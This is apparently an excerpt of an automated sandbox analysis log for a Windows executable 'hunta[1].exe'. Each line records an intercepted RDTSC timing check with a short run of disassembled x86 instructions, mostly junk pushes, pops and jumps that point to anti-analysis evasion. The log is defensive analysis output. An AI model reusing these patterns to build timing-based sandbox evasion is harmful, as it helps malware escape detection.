            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A956B second address: 11A9586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF2E55A2C36h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11AA3D4 second address: 11AA3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11AA3DA second address: 11AA3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11AA3E0 second address: 11AA3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B41DA second address: 11B41E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2B83 second address: 11B2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a jmp 00007FF2E5514DECh 0x0000000f jns 00007FF2E5514DE6h 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2CF6 second address: 11B2D02 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2D02 second address: 11B2D12 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E5514DE8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2D12 second address: 11B2D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2E65 second address: 11B2E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2E6B second address: 11B2E78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E55A2C28h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2FE7 second address: 11B2FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B38DF second address: 11B3918 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF2E55A2C2Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FF2E55A2C38h 0x00000019 jnl 00007FF2E55A2C26h 0x0000001f pop edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B3918 second address: 11B3928 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DF2h 0x00000008 jbe 00007FF2E5514DE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 115C543 second address: 115C55C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f jg 00007FF2E55A2C26h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 115C55C second address: 115C579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push esi 0x0000000c jbe 00007FF2E5514DE6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007FF2E5514DE6h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B404A second address: 11B4059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jnp 00007FF2E55A2C26h 0x0000000e pop edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B4059 second address: 11B405E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B405E second address: 11B4066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2832 second address: 11B2836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2836 second address: 11B2843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B2843 second address: 11B284D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E5514DE6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176C44 second address: 1176C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176C48 second address: 1176C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176C4C second address: 1176C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176C52 second address: 1176C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176C57 second address: 1176CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF2E55A2C28h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a adc edi, 41F36D34h 0x00000030 lea eax, dword ptr [ebp+1247C9A6h] 0x00000036 mov ecx, dword ptr [ebp+122D2A4Dh] 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176CA3 second address: 1176CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176CA7 second address: 1176CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1176CAB second address: 115BA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E5514DEDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 jmp 00007FF2E5514DEEh 0x00000019 popad 0x0000001a pop edi 0x0000001b nop 0x0000001c call dword ptr [ebp+122D2037h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF2E5514DF0h 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1177397 second address: 11773A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF2E55A2C26h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11773A4 second address: 11773A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11778A3 second address: 11778D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF2E55A2C39h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, 53426DAFh 0x00000011 push 00000004h 0x00000013 movzx edx, ax 0x00000016 nop 0x00000017 push esi 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1177DF5 second address: 1177DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1178067 second address: 115C543 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f call dword ptr [ebp+1244E4F4h] 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FF2E55A2C26h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B7D58 second address: 11B7D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B7EF6 second address: 11B7EFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B7EFB second address: 11B7F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF2E5514DE6h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B7F08 second address: 11B7F19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B7F19 second address: 11B7F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B7F1D second address: 11B7F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF2E55A2C26h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B7F2B second address: 11B7F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8076 second address: 11B8080 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8080 second address: 11B8086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8086 second address: 11B80C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF2E55A2C26h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007FF2E55A2C28h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FF2E55A2C33h 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FF2E55A2C2Bh 0x00000026 jmp 00007FF2E55A2C2Fh 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B80C4 second address: 11B80CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B824B second address: 11B8257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FF2E55A2C26h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8257 second address: 11B825D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B83F2 second address: 11B83F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B83F6 second address: 11B842D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF2E5514E05h 0x0000000c jg 00007FF2E5514DE6h 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 ja 00007FF2E5514DE8h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B842D second address: 11B8467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8467 second address: 11B846D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B85D9 second address: 11B85E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF2E55A2C26h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B85E9 second address: 11B85F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B873A second address: 11B8751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8751 second address: 11B8757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8757 second address: 11B8781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E55A2C26h 0x0000000a popad 0x0000000b jbe 00007FF2E55A2C43h 0x00000011 jmp 00007FF2E55A2C37h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B8781 second address: 11B87AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FF2E5514DEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11B88ED second address: 11B88F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11BE5F9 second address: 11BE64D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF2E5514DF2h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnl 00007FF2E5514DE6h 0x0000001d jmp 00007FF2E5514DF4h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push edx 0x00000026 jmp 00007FF2E5514DECh 0x0000002b pushad 0x0000002c popad 0x0000002d pop edx 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C13A2 second address: 11C13BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF2E55A2C2Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF2E55A2C26h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C13BE second address: 11C13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C13C2 second address: 11C13D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C26h 0x00000011 jno 00007FF2E55A2C26h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C13D9 second address: 11C13E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C16E3 second address: 11C16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C1877 second address: 11C187F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C52E5 second address: 11C5307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E55A2C33h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C999D second address: 11C99E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF2E5514E0Bh 0x0000000c jmp 00007FF2E5514DF7h 0x00000011 jmp 00007FF2E5514DEEh 0x00000016 jmp 00007FF2E5514DEFh 0x0000001b popad 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C99E5 second address: 11C99EF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C99EF second address: 11C99FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C8C08 second address: 11C8C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C902E second address: 11C904F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF2E5514DE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E5514DF5h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C904F second address: 11C9070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF2E55A2C26h 0x00000009 jmp 00007FF2E55A2C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C9070 second address: 11C907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF2E5514DECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C9209 second address: 11C9217 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C9217 second address: 11C921B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C921B second address: 11C9221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C935C second address: 11C9360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11C951F second address: 11C9540 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C35h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CF3E4 second address: 11CF3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CF3E8 second address: 11CF40E instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E55A2C3Dh 0x00000008 jmp 00007FF2E55A2C37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CF40E second address: 11CF419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E5514DE6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CDD2F second address: 11CDD41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CDD41 second address: 11CDD47 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CDEB1 second address: 11CDEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CDFE9 second address: 11CDFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CE2E3 second address: 11CE302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CE302 second address: 11CE306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CE44F second address: 11CE461 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FF2E55A2C26h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1177ABB second address: 1177ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1177BB1 second address: 1177BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
